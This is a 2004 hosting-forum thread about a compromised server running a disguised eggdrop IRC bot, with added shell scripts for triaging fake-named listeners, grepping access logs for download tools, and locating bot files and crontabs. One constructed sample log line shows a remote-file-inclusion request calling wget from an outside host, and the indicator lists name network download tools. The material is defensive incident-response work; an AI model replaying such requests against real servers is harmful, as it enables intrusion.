major problem with eggdrop / crontab maybe

Discussion in 'General Discussion' started by chadi, Sep 25, 2004.

  1. chadi
    I am not sure what this is here but I've been getting these emails constantly, about 3-4 every ten minutes. Copies of the emails are below:

    Couldn't find bot 'Fandy' running, reloading...

    ==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 19746
    [21:20] --- Loading eggdrop v1.6.1+IPv6-Akke (Sat Sep 25 2004)
    [21:20] Module loaded: transfer
    [21:20] Listening at telnet port 9999 (users)
    [21:20] Module loaded: channels
    [21:20] Module loaded: server
    [21:20] Module loaded: ctcp
    [21:20] Module loaded: irc
    [21:20] Module loaded: share
    [21:20] Module loaded: filesys (with lang support)
    [21:20] Module loaded: notes (with lang support)
    [21:20] Module loaded: console (with lang support)
    [21:20] Module loaded: blowfish
    [21:20] Module loaded: assoc (with lang support)
    [21:20] Module loaded: wire (with lang support)
    [21:20] Tcl error in file 'a':
    [21:20] invalid command name "proc_msgshowallinfo"
    while executing
    "proc_msgshowallinfo {nick uhost hand rest} {
    global nick nickpass realname owner kops my-ip banner cycle_random
    global notc notm logstore cfgfile ban-..."
    (file "scripts/ary.tcl" line 679)
    invoked from within
    "source scripts/ary.tcl"
    [21:20] * CONFIG FILE NOT LOADED (NOT FOUND, OR ERROR)
    [21:20] 3
    [21:20] Attempt to kill un-allocated socket 3 !!

    Eggdrop v1.6.1+IPv6-Akke (c)1997 Robey Pointer (c)1999, 2000 Eggheads, IPv6
    support by Akke


    Couldn't find bot 'psfonts' running, reloading...

    ==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 19754
    [21:20] --- Loading eggdrop v1.6.1+IPv6-Akke (Sat Sep 25 2004)
    [21:20] Module loaded: transfer
    [21:20] Listening at telnet port 9999 (users)
    [21:20] Module loaded: channels
    [21:20] Module loaded: server
    [21:20] Module loaded: ctcp
    [21:20] Module loaded: irc
    [21:20] Module loaded: share
    [21:20] Module loaded: filesys (with lang support)
    [21:20] Module loaded: notes (with lang support)
    [21:20] Module loaded: console (with lang support)
    [21:20] Module loaded: blowfish
    [21:20] Module loaded: assoc (with lang support)
    [21:20] Module loaded: wire (with lang support)
    [21:20] Tcl error in file 'b':
    [21:20] invalid command name "proc_msgshowallinfo"
    while executing
    "proc_msgshowallinfo {nick uhost hand rest} {
    global nick nickpass realname owner kops my-ip banner cycle_random
    global notc notm logstore cfgfile ban-..."
    (file "scripts/ary.tcl" line 679)
    invoked from within
    "source scripts/ary.tcl"
    [21:20] * CONFIG FILE NOT LOADED (NOT FOUND, OR ERROR)
    [21:20] 3
    [21:20] Attempt to kill un-allocated socket 3 !!

    Eggdrop v1.6.1+IPv6-Akke (c)1997 Robey Pointer (c)1999, 2000 Eggheads, IPv6
    support by Akke


    Couldn't find bot 'D00r' running, reloading...

    ==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 19751
    [21:20] --- Loading eggdrop v1.6.1+IPv6-Akke (Sat Sep 25 2004)
    [21:20] Module loaded: transfer
    [21:20] Listening at telnet port 9999 (users)
    [21:20] Module loaded: channels
    [21:20] Module loaded: server
    [21:20] Module loaded: ctcp
    [21:20] Module loaded: irc
    [21:20] Module loaded: share
    [21:20] Module loaded: filesys (with lang support)
    [21:20] Module loaded: notes (with lang support)
    [21:20] Module loaded: console (with lang support)
    [21:20] Module loaded: blowfish
    [21:20] Module loaded: assoc (with lang support)
    [21:20] Module loaded: wire (with lang support)
    [21:20] Tcl error in file 'c':
    [21:20] invalid command name "proc_msgshowallinfo"
    while executing
    "proc_msgshowallinfo {nick uhost hand rest} {
    global nick nickpass realname owner kops my-ip banner cycle_random
    global notc notm logstore cfgfile ban-..."
    (file "scripts/ary.tcl" line 679)
    invoked from within
    "source scripts/ary.tcl"
    [21:20] * CONFIG FILE NOT LOADED (NOT FOUND, OR ERROR)
    [21:20] 3

    Eggdrop v1.6.1+IPv6-Akke (c)1997 Robey Pointer (c)1999, 2000 Eggheads, IPv6
    support by Akke


    ----
    For the record, I've checked all background process killers in WHM, checked "prevent nobody from sending emails...", enabled open_basedir, enabled mod_userdir, disabled compilers tweak, enabled suexec. What else can I do here to stop whatever this nonsense is?
     
  2. StevenC
    Well it looks like you were exploited.

    cd /usr/local/apache/domlogs
    grep wget *
     
  3. chadi
    What exactly should I do?
     
  4. AbeFroman
    Type
    uname -r
    netstat -lntp

    Paste the results here.

    Also, download, install, and run RootKit Hunter.

    It looks like you have a RootKit installed. Make sure you have a backup of everything. You may have to reinstall the OS but you can probably save it.

    You can email me directly at abe__froman@hotmail.com for help.
     
  5. chadi
    Results:

    Active Internet connections (only servers)
    Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
    tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN 10575/stunnel-4.04l
    tcp 0 0 0.0.0.0:1 0.0.0.0:* LISTEN 1927/portsentry
    tcp 0 0 0.0.0.0:2082 0.0.0.0:* LISTEN 10554/cpsrvd - wait
    tcp 0 0 0.0.0.0:2083 0.0.0.0:* LISTEN 10575/stunnel-4.04l
    tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN 10575/stunnel-4.04l
    tcp 0 0 0.0.0.0:2084 0.0.0.0:* LISTEN 10368/entropychat
    tcp 0 0 0.0.0.0:6693 0.0.0.0:* LISTEN 1787/sendmail: acce
    tcp 0 0 0.0.0.0:2086 0.0.0.0:* LISTEN 10554/cpsrvd - wait
    tcp 0 0 0.0.0.0:2087 0.0.0.0:* LISTEN 10575/stunnel-4.04l
    tcp 0 0 0.0.0.0:6666 0.0.0.0:* LISTEN 10366/startmelange
    tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 1515/mysqld
    tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN 10351/cppop - accep
    tcp 0 0 0.0.0.0:2095 0.0.0.0:* LISTEN 10554/cpsrvd - wait
    tcp 0 0 127.0.0.1:783 0.0.0.0:* LISTEN 29869/spamd -d
    tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1927/portsentry
    tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN 1222/xinetd
    tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 27207/httpd
    tcp 0 0 0.0.0.0:2096 0.0.0.0:* LISTEN 10575/stunnel-4.04l
    tcp 0 0 0.0.0.0:465 0.0.0.0:* LISTEN 29813/exim
    tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 1231/vsftpd
    tcp 0 0 69.9.174.2:53 0.0.0.0:* LISTEN 1188/named
    tcp 0 0 69.9.174.15:53 0.0.0.0:* LISTEN 1188/named
    tcp 0 0 69.9.174.14:53 0.0.0.0:* LISTEN 1188/named
    tcp 0 0 69.9.174.13:53 0.0.0.0:* LISTEN 1188/named
    tcp 0 0 69.9.174.12:53 0.0.0.0:* LISTEN 1188/named
    tcp 0 0 69.9.174.11:53 0.0.0.0:* LISTEN 1188/named
    tcp 0 0 69.9.174.10:53 0.0.0.0:* LISTEN 1188/named
    tcp 0 0 69.9.174.9:53 0.0.0.0:* LISTEN 1188/named
    tcp 0 0 69.9.174.8:53 0.0.0.0:* LISTEN 1188/named
    tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 1188/named
    tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1209/sshd
    tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 29808/exim
    tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 1188/named
    tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 27207/httpd
     
  6. chadi
    RootKit Hunter results:

    Rootkit Hunter 1.1.1 is running

    Determining OS... Ready


    Checking binaries
    * Selftests
    Strings (command) [ OK ]


    * System tools
    Info: prelinked files found
    Performing 'known good' check...
    /usr/bin/find [ OK ]
    /usr/bin/file [ OK ]
    /usr/sbin/prelink: "/usr/bin/groups" is not an ELF file
    /usr/bin/groups [ OK ]
    /usr/bin/kill [ OK ]
    /usr/bin/killall [ OK ]
    /usr/bin/lsattr [ OK ]
    /usr/bin/pstree [ OK ]
    /usr/bin/sha1sum [ OK ]
    /usr/bin/stat [ OK ]
    /usr/bin/users [ OK ]
    /usr/bin/w [ OK ]
    /usr/bin/watch [ OK ]
    /usr/bin/who [ OK ]
    /usr/bin/whoami [ OK ]
    /bin/mount [ OK ]
    /bin/netstat [ OK ]
    /bin/egrep [ OK ]
    /bin/fgrep [ OK ]
    /bin/grep [ OK ]
    /bin/cat [ OK ]
    /bin/chmod [ OK ]
    /bin/chown [ OK ]
    /bin/env [ OK ]
    /bin/ls [ OK ]
    /bin/su [ OK ]
    /bin/ps [ OK ]
    /bin/dmesg [ OK ]
    /bin/kill [ OK ]
    /bin/login [ OK ]
    /sbin/chkconfig [ OK ]
    /sbin/depmod [ OK ]
    /sbin/ifconfig [ OK ]
    /sbin/insmod [ OK ]
    /sbin/ip [ OK ]
    /sbin/modinfo [ OK ]
    /sbin/sysctl [ OK ]
    /sbin/syslogd [ OK ]
    /sbin/init [ OK ]
    /sbin/runlevel [ OK ]

    * Suspicious files and malware
    Scanning for known rootkit files [ OK ]
    Miscellaneous Login backdoors [ OK ]
    Miscellaneous directories [ OK ]
    Sniffer logs [ OK ]

    [Press <ENTER> to continue]


    * Trojan specific characteristics
    shv4
    Checking /etc/rc.d/rc.sysinit
    Test 1 [ Clean ]
    Test 2 [ Clean ]
    Test 3 [ Clean ]
    Checking /etc/inetd.conf [ Clean ]

    * Suspicious file properties
    chmod properties
    Checking /bin/ps [ Clean ]
    Checking /bin/ls [ Clean ]
    Checking /usr/bin/w [ Clean ]
    Checking /usr/bin/who [ Clean ]
    Checking /bin/netstat [ Clean ]
    Checking /bin/login [ Clean ]
    Script replacements
    Checking /bin/ps [ Clean ]
    Checking /bin/ls [ Clean ]
    Checking /usr/bin/w [ Clean ]
    Checking /usr/bin/who [ Clean ]
    Checking /bin/netstat [ Clean ]
    Checking /bin/login [ Clean ]

    * OS dependant tests

    Linux
    Checking loaded kernel modules... [ OK ]


    Networking
    * Check: frequently used backdoors
    Port 2001: Scalper Rootkit [ OK ]
    Port 2006: CB Rootkit [ OK ]
    Port 2128: MRK [ OK ]
    Port 14856: Optic Kit (Tux) [ OK ]
    Port 47107: T0rn Rootkit [ OK ]
    Port 60922: zaRwT.KiT [ OK ]

    * Interfaces
    Scanning for promiscuous interfaces [ OK ]

    System checks
    * Allround tests
    Checking hostname... Found. Hostname is host.nibuhadns.com
    Checking for differences in user accounts... [ NA ]
    Checking for differences in user groups... Creating file It seems this is your first time.
    Checking rc.local file...
    - /etc/rc.local [ OK ]
    - /etc/rc.d/rc.local [ OK ]
    - /usr/local/etc/rc.local [ Not found ]
    - /usr/local/etc/rc.d/rc.local [ Not found ]
    - /etc/conf.d/local.start [ Not found ]
    Checking rc.d files...
    Processing...
    Result rc.d files check [ OK ]
    Checking history files
    Bourne Shell [ OK ]

    * Filesystem checks
    Checking /dev for suspicious files... [ OK ]
    Scanning for hidden files... [ OK ]

    [Press <ENTER> to continue]



    Security advisories
    * Check: Groups and Accounts
    Searching for /etc/passwd... [ Found ]
    Checking users with UID '0' (root)... [ OK ]

    * Check: SSH
    Searching for sshd_config...
    Found /etc/ssh/sshd_config
    Checking for allowed root login... [ OK (Remote root login disabled) ]
    Checking for allowed protocols... [ Warning (SSH v1 allowed) ]

    * Check: Events and Logging
    Search for syslog configuration... found
    Checking for running syslog slave... [ OK ]
    Checking for logging to remote system... [ OK (no remote logging) ]


    ---------------------------- Scan results ----------------------------

    MD5
    MD5 compared: 41
    Incorrect MD5 checksums: 0

    File scan
    Scanned files: 309
    Possible infected files: 0
    Possible rootkits:

    Scanning took 44 seconds
     
  7. AbeFroman
    Thanks, now do
    uname -r

    You can get rootkit hunter here:
    http://www.rootkit.nl/projects/rootkit_hunter.html

    It looks like they have eggdrop or something running on port 6693 claiming to be sendmail
    tcp 0 0 0.0.0.0:6693 0.0.0.0:* LISTEN 1787/sendmail: acce

    Please type
    cat /proc/1787/cmdline
    cat /proc/1787/environ

    paste output here.
     
  8. chadi
    As you can see on my previous post, I have already installed and run rootkit hunter.

    2.6.8-1.521smp

    root@host [~]# cat /proc/1787/cmdline
    sendmail: accepting connections

    root@host [~]# cat /proc/1787/environ
    SHELL=/bin/sh
    PATH=/usr/bin:/bin
    _=./proc
    PWD=/home/gvllweb/public_html/images/language/.psy
    SHLVL=3
    HOME=/
    LOGNAME=nobody
    root@host [~]#
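The /proc check in the two posts above is the decisive one: the process on port 6693 claims to be "sendmail: accepting connections", yet its environment shows it was started as ./proc from a hidden .psy directory under a customer's public_html, as user nobody, which is also what the "Fakename: /usr/local/apache/bin/httpd -DSSL" line in the first e-mail is about. The script below is an added example, not code from the thread or from eggdrop, that automates that comparison for every listening socket: it reads netstat -lntp and then checks each PID's /proc entries for a command name that does not match the real executable, a working directory under a web root, /tmp or a hidden directory, a deleted binary, and the nobody user. The "scan"/"demo" arguments and the exe path used in demo (inferred from PWD and _=./proc in the environ output) are assumptions.

```shell
#!/bin/sh
# Added example, not code from the thread or from eggdrop: triage every
# listening TCP socket by comparing what a process claims to be
# (/proc/PID/cmdline) with what the kernel knows about it (/proc/PID/exe,
# /proc/PID/cwd and the UID in /proc/PID/status).  A bot started under a
# fake name shows up as "sendmail: accepting connections" or "httpd -DSSL"
# in ps and netstat, but exe and cwd still point at the real binary and the
# directory it was launched from.  The "scan" argument and the exe path in
# demo (inferred from PWD and _=./proc in the environ output) are assumptions.

# Decide whether one listener deserves a look.
#   $1 = claimed command   (first word of /proc/PID/cmdline)
#   $2 = real executable   (readlink /proc/PID/exe)
#   $3 = working directory (readlink /proc/PID/cwd)
#   $4 = user the process runs as
# Prints the reasons and returns 0 if suspicious, 1 if nothing stood out.
listener_suspect() {
    claimed=$1; exe=$2; cwd=$3; user=$4
    reasons=""
    # "sendmail: accepting connections" -> sendmail; "/usr/sbin/exim" -> exim
    claimed_base=${claimed##*/}
    claimed_base=${claimed_base%%:*}
    exe_base=${exe##*/}
    exe_base=${exe_base%" (deleted)"}   # kernel's suffix for an unlinked binary
    if [ "$claimed_base" != "$exe_base" ]; then
        reasons="$reasons name-mismatch(claims=$claimed_base,real=$exe_base)"
    fi
    # System daemons do not run out of customer web roots, temp or hidden dirs.
    case $cwd in
        /home/*/public_html/*|/tmp/*|/var/tmp/*|/dev/shm/*|*/.*)
            reasons="$reasons cwd=$cwd" ;;
    esac
    case $exe in
        *"(deleted)") reasons="$reasons exe-deleted" ;;
    esac
    # The web server's user (nobody under cPanel) should own no extra listeners.
    if [ "$user" = nobody ]; then
        reasons="$reasons user=nobody"
    fi
    if [ -n "$reasons" ]; then
        printf '%s\n' "$reasons"
        return 0
    fi
    return 1
}

# UID -> user name from /etc/passwd (getent is not available everywhere).
uid_to_name() {
    awk -F: -v u="$1" '$3 == u { print $1; exit }' /etc/passwd
}

# Walk netstat -lntp, the command used in the thread, and check each PID.
# Run as root: /proc/PID/exe and /proc/PID/cwd are unreadable otherwise.
scan_listeners() {
    netstat -lntp 2>/dev/null |
    awk '$6 == "LISTEN" && $7 ~ /^[0-9]+\// { split($7, a, "/"); print $4, a[1] }' |
    while read -r laddr pid; do
        [ -r "/proc/$pid/cmdline" ] || continue
        claimed=$(tr '\0' ' ' < "/proc/$pid/cmdline" | cut -d' ' -f1)
        exe=$(readlink "/proc/$pid/exe" 2>/dev/null || true)
        cwd=$(readlink "/proc/$pid/cwd" 2>/dev/null || true)
        user=$(uid_to_name "$(awk '/^Uid:/ { print $2 }' "/proc/$pid/status")")
        if why=$(listener_suspect "$claimed" "$exe" "$cwd" "$user"); then
            printf 'SUSPECT pid=%s listen=%s claims=%s exe=%s cwd=%s user=%s reasons:%s\n' \
                "$pid" "$laddr" "$claimed" "$exe" "$cwd" "$user" "$why"
        fi
    done
}

# Offline demonstration with the values from the thread: the fake "sendmail"
# on port 6693 next to what a genuine sendmail would look like.
demo() {
    listener_suspect "sendmail:" \
        /home/gvllweb/public_html/images/language/.psy/proc \
        /home/gvllweb/public_html/images/language/.psy nobody
    listener_suspect "sendmail:" /usr/sbin/sendmail / root || echo "genuine sendmail: clean"
}

case ${1:-} in
    scan) scan_listeners ;;
    demo) demo ;;
esac
```

Run it as root with `sh listener-triage.sh scan` (or `demo` for the offline comparison). Daemons that are interpreted scripts report the interpreter (for example /usr/bin/perl) as their executable and will trip the name check, so treat a hit as a lead to confirm with `readlink /proc/PID/cwd` and `ls -la` of that directory rather than as a verdict. Rootkit Hunter passing ps and netstat above is what makes /proc worth trusting here; and as post #9's kill shows, ending the process only buys time until whatever started it runs again.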
     
  9. AbeFroman
    kill -9 1787
    kill -9 1787
    yes, twice, it should say "no process killed" the second time

    suspend this account immediately gvllweb
    he is running vulnerable scripts.

    La'shana Tova!

    Glad I could help,
    Sincerely,
    Abe Froman
    Security Expert
    "I'm game for security"
     
  10. StevenC
    #10 StevenC, Sep 25, 2004
    Last edited: Sep 25, 2004
  11. AbeFroman
    This response was not great.

    Sincerely,
    Abe Froman
    Security Expert
    "I'm game for security"
     
    #11 AbeFroman, Sep 26, 2004
    Last edited: Sep 27, 2004
  12. chadi
    Well, the problem still persists. Anyone know what could be the problem?
     
  13. StevenC

    It will tell him what script was exploited if he was exploited by a php script. Besides you tried to feed him some garbage when you know nothing about security except a few bits of info people have given you. It also appears you ignored my post. You cannot become a security expert in 11 days. Also in order for you to become a security expert you must be an expert in Linux:

    http://forums.cpanel.net/showthread.php?t=29895
    Doesn't appear you are an expert... that is general Linux knowledge.
     
    #13 StevenC, Sep 26, 2004
    Last edited: Sep 26, 2004
  14. AbeFroman
    Try netstat again, is that port open again?
     
  15. AbeFroman
    Not if it was exploited using anything other than wget, nor if it was exploited before the logs were rotated.
     
  16. chadi
    What am I supposed to be looking for exactly? I ran netstat and it showed about 100+ lines of info, some "timed wait" and others "established".

    What should I show you?
     
  17. StevenC
    grep lynx *
    grep rcp *
    grep scp *
    grep eggdrop *
    grep fetch *
    grep curl *
    grep "/tmp" *



    Happy now?
     
  18. chadi
    Results:

    root@host [~]# grep lynx *
    install.log:lynx-2.8.5-15.i386.rpm

    root@host [~]# grep rcp *
    root@host [~]#

    root@host [~]# grep scp *
    root@host [~]#

    root@host [~]# grep eggdrop *
    root@host [~]#

    root@host [~]# grep fetch *
    install.log:Installing fetchmail-6.2.5-2.i386.
    root@host [~]#

    root@host [~]# grep curl *
    install.log:Installing curl-7.11.1-1.i386.
    install.log:Installing curl-devel-7.11.1-1.i386.
    root@host [~]#

    root@host [~]# grep "/tmp" *
    install:$opt{directory} = "/tmp/sis-packages";
    install: (defaults to '/tmp/sis-packages')
    root@host [~]#
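The grep list above is sound, but the prompt in the results shows it was run in root's home directory ("root@host [~]#"), which is why the only matches are install.log entries; post #2 pointed at /usr/local/apache/domlogs. The script below is an added example, not code from the thread or from cPanel, that runs the same indicators over a directory of Apache access logs, counts hits per log so the account whose site was used stands out, and prints the matching request lines for one log. The DOMLOGS path, the "scan"/"demo" arguments and the two sample log lines are assumptions or constructed data.

```shell
#!/bin/sh
# Added example, not code from the thread or from cPanel: StevenC's indicator
# greps run over Apache's per-domain access logs instead of the current
# directory, with hits counted per log.  DOMLOGS, the "scan"/"demo" arguments
# and the sample lines in make_sample_logs are assumptions/constructed data.

DOMLOGS=${DOMLOGS:-/usr/local/apache/domlogs}
INDICATORS="wget lynx rcp scp eggdrop fetch curl /tmp"

# Print "logfile indicator count" for each indicator found in each log under $1.
# Returns 0 if anything matched, 1 if every log was clean.
scan_domlogs() {
    found=1
    for log in "$1"/*; do
        [ -f "$log" ] || continue
        for ind in $INDICATORS; do
            # -F literal (so "/tmp" is not a pattern), -i because attackers vary
            # case, -c count only; "|| true" keeps a clean log from aborting a
            # script run under set -e (grep -c exits 1 on zero matches).
            n=$(grep -Fic -- "$ind" "$log" || true)
            if [ "${n:-0}" -gt 0 ]; then
                printf '%s %s %s\n' "$log" "$ind" "$n"
                found=0
            fi
        done
    done
    return $found
}

# Print client IP, timestamp and request line for every hit of $2 in log $1.
# The combined log format keeps the request line between the first pair of
# double quotes, which is what the awk split on '"' relies on.
show_hits() {
    grep -Fi -- "$2" "$1" | awk -F'"' '{ split($1, a, " "); print a[1], a[4], $2 }'
}

# Constructed sample logs for an offline run: one request that pulled a remote
# file through a script parameter, one ordinary page view.  Documentation
# addresses only; nothing here came from the thread's server.
make_sample_logs() {
    mkdir -p "$1"
    printf '%s\n' \
      '198.51.100.7 - - [25/Sep/2004:21:15:02 -0400] "GET /gallery.php?page=http://203.0.113.9/x.txt?cmd=wget HTTP/1.1" 200 512 "-" "-"' \
      > "$1/example.com"
    printf '%s\n' \
      '192.0.2.3 - - [25/Sep/2004:21:16:10 -0400] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/4.0"' \
      > "$1/clean.example"
}

case ${1:-} in
    scan) scan_domlogs "$DOMLOGS" ;;
    demo)
        d=${TMPDIR:-/tmp}/domlogs-demo.$$
        make_sample_logs "$d"
        scan_domlogs "$d"
        show_hits "$d/example.com" wget
        rm -rf "$d" ;;
esac
```

As post #15 points out, this only finds what went through the web server under one of those tool names, and only within logs that have not been rotated; a request that fetched its payload with a URL-encoded or differently named tool will not match. Expect false positives too: any User-Agent string containing "curl" or "wget" matches, so read the request lines from show_hits rather than acting on the counts alone.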
     
  19. WestBend
    I am not a security expert. However, I have used eggdrops for years.

    The eggdrop is not loading up so it is sending an email saying it could not load its config file in which case it dies. When it does load it is attempting to open port 9999 for remote telnet connections by user.


    Here are some of the files an eggie normally uses, try searching for them specifically:

    autobotchk
    *.user
    *.chan
    pid.botname
    assoc.so
    console.so
    server.so
    uptime.so
    blowfish.so
    ctcp.so
    irc.so
    share.so
    wire.so
    channels.so
    dns.so
    notes.so
    stats.so
    woobie.so
    compress.so
    filesys.so
    seen.so
    transfer.so

    directories :

    filesys
    modules



    One last quick question...

    Where are the emails coming from? Are they actually coming from your server, or has someone put your email address in their config file, in which case all you're doing is getting notices... but nothing has been installed on your server. It would be a little strange to root someone's box and then have any error emails sent to the email addresses on the rooted box.
     
    #19 WestBend, Sep 26, 2004
    Last edited: Sep 26, 2004
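A way to act on the file list above, as an added example that is not code from the thread or from eggdrop: sweep the home directories for the names WestBend gives, list hidden directories below any public_html (the process in this thread ran from .../public_html/images/language/.psy), and read the per-user crontabs, since the "Couldn't find bot 'X' running, reloading..." text in the first post is what eggdrop's botchk/autobotchk cron script prints when the bot is down, and cron mails a job's output to the crontab's owner on the machine the crontab lives on. SEARCH_ROOT, CRON_SPOOL, the "scan" argument and the tree built by make_sample_tree are assumptions or constructed data.

```shell
#!/bin/sh
# Added example, not code from the thread or from eggdrop: a filesystem and
# crontab sweep for eggdrop's usual footprint.  SEARCH_ROOT, CRON_SPOOL, the
# "scan" argument and make_sample_tree's tree are assumptions/constructed data.

SEARCH_ROOT=${SEARCH_ROOT:-/home}
CRON_SPOOL=${CRON_SPOOL:-/var/spool/cron}   # per-user crontabs on Red Hat-style systems

# Every path under $1 whose name is on WestBend's list (plus the two directory
# names he gives), sorted for stable output.
find_eggdrop_artifacts() {
    find "$1" \( -name autobotchk -o -name '*.user' -o -name '*.chan' \
        -o -name 'pid.*' -o -name assoc.so -o -name console.so \
        -o -name server.so -o -name uptime.so -o -name blowfish.so \
        -o -name ctcp.so -o -name irc.so -o -name share.so -o -name wire.so \
        -o -name channels.so -o -name dns.so -o -name notes.so \
        -o -name stats.so -o -name woobie.so -o -name compress.so \
        -o -name filesys.so -o -name seen.so -o -name transfer.so \
        -o \( -type d \( -name filesys -o -name modules \) \) \) \
        -print 2>/dev/null | sort
}

# Hidden directories below any public_html: a customer's site rarely needs one.
find_hidden_webroot_dirs() {
    find "$1" -path '*/public_html/*' -type d -name '.*' -print 2>/dev/null | sort
}

# Crontab files in $1 that mention botchk, eggdrop, or anything under a
# public_html (a cron job that runs a program out of a web root is wrong
# whatever the program is).  Those files are what keep the bot coming back.
find_bot_crontabs() {
    grep -il -e botchk -e eggdrop -e public_html -- "$1"/* 2>/dev/null | sort
}

# Constructed sample tree (nothing copied from the thread's server): one
# account with a hidden bot directory and a matching crontab, one clean account.
make_sample_tree() {
    bot="$1/home/gvllweb/public_html/images/language/.psy"
    mkdir -p "$bot/modules" "$1/home/clean/public_html" "$1/cron"
    : > "$bot/assoc.so"; : > "$bot/pid.psfonts"; : > "$bot/autobotchk"
    : > "$1/home/clean/public_html/index.html"
    printf '%s\n' "*/10 * * * * $bot/autobotchk" > "$1/cron/nobody"
    printf '%s\n' '0 3 * * * /usr/local/bin/nightly-backup.sh' > "$1/cron/root"
}

if [ "${1:-}" = scan ]; then
    echo "# eggdrop artifacts under $SEARCH_ROOT"; find_eggdrop_artifacts "$SEARCH_ROOT"
    echo "# hidden directories in web roots";      find_hidden_webroot_dirs "$SEARCH_ROOT"
    echo "# crontabs worth reading";               find_bot_crontabs "$CRON_SPOOL"
fi
```

Names like modules, filesys and pid.* are common enough that a single hit is a pointer to inspect with `ls -la`, not proof; the combination that matters is a hidden directory under a web root holding those files plus a crontab that points at it. Removing that crontab entry and the directory (after copying both somewhere for the record) is what stops the "reloading" e-mails; killing the process alone does not, because the cron job starts it again.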
  20. chadi
    Thank you for your response, but what exactly should I do with the files now?

    I basically want to end the notifications and just whatever cronjobs are related.
     